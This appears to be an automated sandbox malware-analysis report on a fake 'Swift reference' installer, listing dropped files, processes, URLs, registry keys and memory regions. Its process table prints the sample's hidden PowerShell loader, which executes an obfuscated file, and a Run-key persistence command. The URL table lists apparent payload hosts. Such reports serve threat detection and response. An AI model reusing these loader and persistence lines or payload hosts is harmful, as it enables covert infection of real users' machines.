Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\Vitis.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff
|
ASCII text, with very long lines (58469), with no line terminators
|
dropped
|
|
|
|
C:\Users\Public\Pictures\timetallenes.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun
Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\Vitis.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_af3as4dx.pex.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ng2smkti.dbo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Noncausal.tre
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\mymarid.ost
|
data
|
dropped
|
||
|
C:\Users\user\Pictures\timetallenes.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600,
atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
|
dropped
|
||
|
C:\Windows\Resources\sans.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600,
atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
|
C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading)
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe" /c "set /A 1^^0
|
|
|
|
C:\Users\user\AppData\Local\Temp\Vitis.exe
|
C:\Users\user\AppData\Local\Temp\Vitis.exe
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ
/d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle
minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://g-eurasia-ru.com/fan/ZfUdfOc32.binM
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://g-eurasia-ru.com/fan/ZfUdfOc32.binu
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://g-eurasia-ru.com/fan/ZfUdfOc32.binZ
|
unknown
|
||
|
http://g-eurasia-ru.com/fan/ZfUdfOc32.binz
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://g-eurasia-ru.com/fan/ZfUdfOc32.binDomiPhaclg-logistic.com.ua/toys/ZfUdfOc32.binSlanOelmig-pal
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://g-eurasia-ru.com/fan/ZfUdfOc32.bin
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://g-eurasia-ru.com/fan/ZfUdfOc32.binA
|
unknown
|
||
|
http://g-eurasia-ru.com/fan/ZfUdfOc32.binD
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://g-eurasia-ru.com/fan/ZfUdfOc32.binh
|
unknown
|
There are 10 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
g-eurasia-ru.com
|
192.121.162.150
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.121.162.150
|
g-eurasia-ru.com
|
Sweden
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\surmuleri\preeducating
|
Befolkningsunderlag
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\coloraturas\Uninstall\Faldet170\hundsede
|
ideales
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Trady
|
tethydan
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\affringens
|
sugan
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\slvsmedjernes\Uninstall\Adhsiv165
|
morbidly
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\rygeannonces\Uninstall\bemeldtes
|
gekkonidae
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\microvolt
|
habilitcar
|
||
|
HKEY_CURRENT_USER\SOFTWARE\debut
|
overpressures
|
||
|
HKEY_CURRENT_USER\SOFTWARE\nekton\plastrendes
|
bewpers
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\enologies\Uselvstndighed
|
kniplende
|
||
|
HKEY_CURRENT_USER\SOFTWARE\lakaj
|
Skllende187
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\Unfelicitousness\Uninstall\Burnsides
|
circumventions
|
||
|
HKEY_CURRENT_USER\SOFTWARE\troldkrabben
|
riser
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Tips
|
unbeauteousness
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\heaumes\Uninstall\Stimulussens\mlkebtte
|
gaugers
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\euryphagous\Uninstall\safariing
|
Dobbeltmoralers166
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\forskudsbetalinger\Edderfugl163
|
Shipside
|
||
|
HKEY_CURRENT_USER\Oxylabrax
|
Discumber
|
||
|
HKEY_CURRENT_USER\Environment
|
Trimmere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Bortopereringer
|
There are 10 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8F67000
|
direct allocation
|
page execute and read and write
|
|
|
|
18C7000
|
remote allocation
|
page execute and read and write
|
|
|
|
5A0000
|
heap
|
page read and write
|
||
|
4AF000
|
unkown
|
page readonly
|
||
|
2860000
|
direct allocation
|
page read and write
|
||
|
41CD000
|
stack
|
page read and write
|
||
|
804D000
|
stack
|
page read and write
|
||
|
1E350000
|
direct allocation
|
page read and write
|
||
|
83A0000
|
trusted library allocation
|
page read and write
|
||
|
6A4E000
|
stack
|
page read and write
|
||
|
B69000
|
heap
|
page read and write
|
||
|
72C7000
|
trusted library allocation
|
page read and write
|
||
|
6BCF000
|
stack
|
page read and write
|
||
|
AA9000
|
heap
|
page read and write
|
||
|
BA0000
|
heap
|
page read and write
|
||
|
4928000
|
trusted library allocation
|
page read and write
|
||
|
72C0000
|
trusted library allocation
|
page read and write
|
||
|
1DE60000
|
heap
|
page read and write
|
||
|
31C0000
|
heap
|
page read and write
|
||
|
7310000
|
trusted library allocation
|
page read and write
|
||
|
1E4EE000
|
stack
|
page read and write
|
||
|
72E0000
|
trusted library allocation
|
page read and write
|
||
|
4B36000
|
trusted library allocation
|
page read and write
|
||
|
4917000
|
trusted library allocation
|
page read and write
|
||
|
2870000
|
direct allocation
|
page read and write
|
||
|
49E1000
|
trusted library allocation
|
page read and write
|
||
|
2850000
|
direct allocation
|
page read and write
|
||
|
4862000
|
trusted library allocation
|
page read and write
|
||
|
878000
|
stack
|
page read and write
|
||
|
3226000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
8170000
|
direct allocation
|
page read and write
|
||
|
4910000
|
heap
|
page readonly
|
||
|
E30000
|
heap
|
page read and write
|
||
|
2489000
|
heap
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
22C5000
|
heap
|
page read and write
|
||
|
2F3E000
|
stack
|
page read and write
|
||
|
711D000
|
heap
|
page read and write
|
||
|
1E0BE000
|
stack
|
page read and write
|
||
|
48CE000
|
stack
|
page read and write
|
||
|
831C000
|
stack
|
page read and write
|
||
|
7FE0000
|
trusted library allocation
|
page read and write
|
||
|
3650000
|
heap
|
page read and write
|
||
|
710000
|
heap
|
page read and write
|
||
|
7350000
|
trusted library allocation
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
745000
|
heap
|
page read and write
|
||
|
2955000
|
heap
|
page read and write
|
||
|
85F0000
|
trusted library allocation
|
page read and write
|
||
|
40D0000
|
direct allocation
|
page read and write
|
||
|
422000
|
unkown
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
7FD0000
|
trusted library allocation
|
page read and write
|
||
|
75D0000
|
trusted library allocation
|
page read and write
|
||
|
704000
|
heap
|
page read and write
|
||
|
2956000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
8130000
|
trusted library allocation
|
page read and write
|
||
|
D1F000
|
stack
|
page read and write
|
||
|
E9A000
|
trusted library allocation
|
page execute and read and write
|
||
|
8260000
|
direct allocation
|
page read and write
|
||
|
4060000
|
direct allocation
|
page read and write
|
||
|
AF4000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
B3E000
|
heap
|
page read and write
|
||
|
710000
|
heap
|
page read and write
|
||
|
82DC000
|
stack
|
page read and write
|
||
|
83E5000
|
heap
|
page read and write
|
||
|
719000
|
heap
|
page read and write
|
||
|
1DE5D000
|
stack
|
page read and write
|
||
|
717D000
|
heap
|
page read and write
|
||
|
7300000
|
trusted library allocation
|
page read and write
|
||
|
4F14000
|
trusted library allocation
|
page read and write
|
||
|
B60000
|
heap
|
page read and write
|
||
|
42C000
|
unkown
|
page read and write
|
||
|
30FD000
|
stack
|
page read and write
|
||
|
69E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
34CF000
|
unkown
|
page read and write
|
||
|
6D10000
|
direct allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
497C000
|
stack
|
page read and write
|
||
|
49C0000
|
heap
|
page execute and read and write
|
||
|
4080000
|
direct allocation
|
page read and write
|
||
|
ADB000
|
heap
|
page read and write
|
||
|
4140000
|
heap
|
page read and write
|
||
|
2952000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
7430000
|
trusted library allocation
|
page read and write
|
||
|
249D000
|
heap
|
page read and write
|
||
|
72F0000
|
trusted library allocation
|
page read and write
|
||
|
756000
|
heap
|
page read and write
|
||
|
6CE0000
|
direct allocation
|
page read and write
|
||
|
295D000
|
heap
|
page read and write
|
||
|
63E000
|
stack
|
page read and write
|
||
|
40C0000
|
direct allocation
|
page read and write
|
||
|
31BE000
|
stack
|
page read and write
|
||
|
BC0000
|
heap
|
page read and write
|
||
|
2408000
|
heap
|
page read and write
|
||
|
72D000
|
heap
|
page read and write
|
||
|
712F000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
808E000
|
stack
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
71D2000
|
heap
|
page read and write
|
||
|
7590000
|
trusted library allocation
|
page read and write
|
||
|
847A000
|
heap
|
page read and write
|
||
|
3120000
|
heap
|
page read and write
|
||
|
2880000
|
direct allocation
|
page read and write
|
||
|
715000
|
heap
|
page read and write
|
||
|
8150000
|
trusted library allocation
|
page read and write
|
||
|
1DD5E000
|
stack
|
page read and write
|
||
|
5B97000
|
trusted library allocation
|
page read and write
|
||
|
742F000
|
stack
|
page read and write
|
||
|
4090000
|
direct allocation
|
page read and write
|
||
|
1720000
|
remote allocation
|
page execute and read and write
|
||
|
9B000
|
stack
|
page read and write
|
||
|
6B0E000
|
stack
|
page read and write
|
||
|
7370000
|
trusted library allocation
|
page read and write
|
||
|
B49000
|
heap
|
page read and write
|
||
|
E48000
|
heap
|
page read and write
|
||
|
9AF000
|
stack
|
page read and write
|
||
|
240F000
|
stack
|
page read and write
|
||
|
70C0000
|
heap
|
page read and write
|
||
|
4880000
|
trusted library allocation
|
page read and write
|
||
|
6B0000
|
heap
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
6CA0000
|
direct allocation
|
page read and write
|
||
|
22C0000
|
heap
|
page read and write
|
||
|
6F90000
|
heap
|
page read and write
|
||
|
2B4D000
|
stack
|
page read and write
|
||
|
A70000
|
heap
|
page read and write
|
||
|
72D000
|
heap
|
page read and write
|
||
|
2473000
|
heap
|
page read and write
|
||
|
75C0000
|
trusted library allocation
|
page read and write
|
||
|
434000
|
unkown
|
page read and write
|
||
|
6B8E000
|
stack
|
page read and write
|
||
|
85C0000
|
trusted library allocation
|
page read and write
|
||
|
2963000
|
heap
|
page read and write
|
||
|
3130000
|
heap
|
page read and write
|
||
|
4C0000
|
heap
|
page read and write
|
||
|
A6D000
|
stack
|
page read and write
|
||
|
1E39E000
|
stack
|
page read and write
|
||
|
4860000
|
trusted library allocation
|
page read and write
|
||
|
1E5EF000
|
stack
|
page read and write
|
||
|
40B0000
|
direct allocation
|
page read and write
|
||
|
7570000
|
trusted library allocation
|
page read and write
|
||
|
E40000
|
heap
|
page read and write
|
||
|
67E000
|
stack
|
page read and write
|
||
|
B65000
|
heap
|
page read and write
|
||
|
A78000
|
heap
|
page read and write
|
||
|
71B6000
|
heap
|
page read and write
|
||
|
960000
|
heap
|
page read and write
|
||
|
6F8E000
|
stack
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
6ACE000
|
stack
|
page read and write
|
||
|
8190000
|
direct allocation
|
page read and write
|
||
|
85E0000
|
direct allocation
|
page execute and read and write
|
||
|
72D000
|
heap
|
page read and write
|
||
|
704000
|
heap
|
page read and write
|
||
|
59E1000
|
trusted library allocation
|
page read and write
|
||
|
2477000
|
heap
|
page read and write
|
||
|
966000
|
heap
|
page read and write
|
||
|
6D00000
|
direct allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
8DC0000
|
direct allocation
|
page execute and read and write
|
||
|
4F0E000
|
trusted library allocation
|
page read and write
|
||
|
E70000
|
trusted library allocation
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
2DBD000
|
stack
|
page read and write
|
||
|
8120000
|
trusted library allocation
|
page read and write
|
||
|
8486000
|
heap
|
page read and write
|
||
|
2FA8000
|
heap
|
page read and write
|
||
|
418E000
|
stack
|
page read and write
|
||
|
8467000
|
heap
|
page read and write
|
||
|
2BFE000
|
unkown
|
page read and write
|
||
|
715000
|
heap
|
page read and write
|
||
|
73EE000
|
stack
|
page read and write
|
||
|
242D000
|
heap
|
page read and write
|
||
|
5B8F000
|
trusted library allocation
|
page read and write
|
||
|
49D0000
|
heap
|
page read and write
|
||
|
2400000
|
heap
|
page read and write
|
||
|
72D000
|
heap
|
page read and write
|
||
|
4AF000
|
unkown
|
page readonly
|
||
|
80E5000
|
trusted library allocation
|
page read and write
|
||
|
AF0000
|
heap
|
page read and write
|
||
|
8472000
|
heap
|
page read and write
|
||
|
42F000
|
unkown
|
page read and write
|
||
|
37D0000
|
trusted library allocation
|
page read and write
|
||
|
B3E000
|
stack
|
page read and write
|
||
|
715000
|
heap
|
page read and write
|
||
|
8140000
|
trusted library allocation
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
B9F000
|
stack
|
page read and write
|
||
|
E37000
|
heap
|
page read and write
|
||
|
85D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
320B000
|
heap
|
page read and write
|
||
|
81B0000
|
heap
|
page read and write
|
||
|
6A85000
|
heap
|
page execute and read and write
|
||
|
294F000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
8180000
|
direct allocation
|
page read and write
|
||
|
40A0000
|
direct allocation
|
page read and write
|
||
|
6F1000
|
heap
|
page read and write
|
||
|
3500000
|
heap
|
page read and write
|
||
|
70F0000
|
heap
|
page read and write
|
||
|
8090000
|
heap
|
page read and write
|
||
|
24B0000
|
heap
|
page read and write
|
||
|
719000
|
heap
|
page read and write
|
||
|
83CE000
|
heap
|
page read and write
|
||
|
E00000
|
heap
|
page read and write
|
||
|
B01000
|
heap
|
page read and write
|
||
|
7FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FB0000
|
heap
|
page read and write
|
||
|
1E340000
|
direct allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
5B89000
|
trusted library allocation
|
page read and write
|
||
|
8110000
|
trusted library allocation
|
page read and write
|
||
|
83E0000
|
heap
|
page read and write
|
||
|
4A43000
|
trusted library allocation
|
page read and write
|
||
|
4865000
|
trusted library allocation
|
page execute and read and write
|
||
|
6B4E000
|
stack
|
page read and write
|
||
|
E73000
|
trusted library allocation
|
page execute and read and write
|
||
|
4AF000
|
unkown
|
page readonly
|
||
|
2F40000
|
heap
|
page read and write
|
||
|
2BB0000
|
heap
|
page read and write
|
||
|
E60000
|
trusted library allocation
|
page read and write
|
||
|
49BE000
|
stack
|
page read and write
|
||
|
704000
|
heap
|
page read and write
|
||
|
4AF000
|
unkown
|
page readonly
|
||
|
7390000
|
trusted library allocation
|
page read and write
|
||
|
6F4E000
|
stack
|
page read and write
|
||
|
E89000
|
trusted library allocation
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
2EFD000
|
stack
|
page read and write
|
||
|
6A80000
|
heap
|
page execute and read and write
|
||
|
425000
|
unkown
|
page read and write
|
||
|
761B000
|
stack
|
page read and write
|
||
|
2890000
|
heap
|
page read and write
|
||
|
5A09000
|
trusted library allocation
|
page read and write
|
||
|
70DF000
|
heap
|
page read and write
|
||
|
2240000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
24A0000
|
heap
|
page read and write
|
||
|
75A0000
|
trusted library allocation
|
page read and write
|
||
|
AB0000
|
heap
|
page read and write
|
||
|
7123000
|
heap
|
page read and write
|
||
|
1E49F000
|
stack
|
page read and write
|
||
|
7580000
|
trusted library allocation
|
page read and write
|
||
|
7187000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
7EF60000
|
trusted library allocation
|
page execute and read and write
|
||
|
40F0000
|
heap
|
page read and write
|
||
|
7550000
|
trusted library allocation
|
page read and write
|
||
|
6CF0000
|
direct allocation
|
page read and write
|
||
|
2290000
|
heap
|
page read and write
|
||
|
317E000
|
unkown
|
page read and write
|
||
|
AAD000
|
stack
|
page read and write
|
||
|
22B0000
|
direct allocation
|
page read and write
|
||
|
5FE000
|
stack
|
page read and write
|
||
|
715000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
427000
|
unkown
|
page read and write
|
||
|
6CB0000
|
direct allocation
|
page read and write
|
||
|
D20000
|
heap
|
page read and write
|
||
|
8160000
|
direct allocation
|
page read and write
|
||
|
A40000
|
heap
|
page read and write
|
||
|
B10000
|
heap
|
page read and write
|
||
|
733000
|
heap
|
page read and write
|
||
|
7560000
|
trusted library allocation
|
page read and write
|
||
|
2500000
|
heap
|
page read and write
|
||
|
6B7000
|
heap
|
page read and write
|
||
|
4200000
|
heap
|
page read and write
|
||
|
710000
|
heap
|
page read and write
|
||
|
490E000
|
stack
|
page read and write
|
||
|
E80000
|
trusted library allocation
|
page read and write
|
||
|
E74000
|
trusted library allocation
|
page read and write
|
||
|
E7D000
|
trusted library allocation
|
page execute and read and write
|
||
|
34F0000
|
heap
|
page read and write
|
||
|
8409000
|
heap
|
page read and write
|
||
|
3222000
|
heap
|
page read and write
|
||
|
3050000
|
heap
|
page read and write
|
||
|
23F0000
|
direct allocation
|
page read and write
|
||
|
5A4A000
|
trusted library allocation
|
page read and write
|
||
|
23E0000
|
direct allocation
|
page read and write
|
||
|
E50000
|
trusted library section
|
page read and write
|
||
|
305B000
|
heap
|
page read and write
|
||
|
842B000
|
heap
|
page read and write
|
||
|
719000
|
heap
|
page read and write
|
||
|
2468000
|
heap
|
page read and write
|
||
|
2840000
|
direct allocation
|
page read and write
|
||
|
719000
|
heap
|
page read and write
|
||
|
7360000
|
heap
|
page execute and read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
75B0000
|
trusted library allocation
|
page read and write
|
||
|
AAF000
|
stack
|
page read and write
|
||
|
3660000
|
heap
|
page read and write
|
||
|
B05000
|
heap
|
page read and write
|
||
|
1E320000
|
direct allocation
|
page read and write
|
||
|
B5E000
|
stack
|
page read and write
|
||
|
5B6000
|
heap
|
page read and write
|
||
|
4050000
|
direct allocation
|
page read and write
|
||
|
A9D000
|
heap
|
page read and write
|
||
|
331F000
|
unkown
|
page read and write
|
||
|
7FA7000
|
stack
|
page read and write
|
||
|
83C000
|
stack
|
page read and write
|
||
|
754D000
|
stack
|
page read and write
|
||
|
E20000
|
trusted library section
|
page read and write
|
||
|
8AE000
|
stack
|
page read and write
|
||
|
35CF000
|
stack
|
page read and write
|
||
|
4040000
|
direct allocation
|
page read and write
|
||
|
750E000
|
stack
|
page read and write
|
||
|
710000
|
heap
|
page read and write
|
||
|
7440000
|
trusted library allocation
|
page read and write
|
||
|
73A0000
|
trusted library allocation
|
page read and write
|
||
|
4070000
|
direct allocation
|
page read and write
|
||
|
83C0000
|
heap
|
page read and write
|
||
|
8435000
|
heap
|
page read and write
|
||
|
1E1BF000
|
stack
|
page read and write
|
||
|
80A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6CC0000
|
direct allocation
|
page read and write
|
||
|
341F000
|
stack
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
1E330000
|
direct allocation
|
page read and write
|
||
|
83B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8270000
|
direct allocation
|
page read and write
|
||
|
244E000
|
stack
|
page read and write
|
||
|
69F0000
|
trusted library allocation
|
page read and write
|
||
|
CDE000
|
stack
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
7380000
|
trusted library allocation
|
page execute and read and write
|
||
|
6CD0000
|
direct allocation
|
page read and write
|
There are 322 hidden memdumps, click here to show them.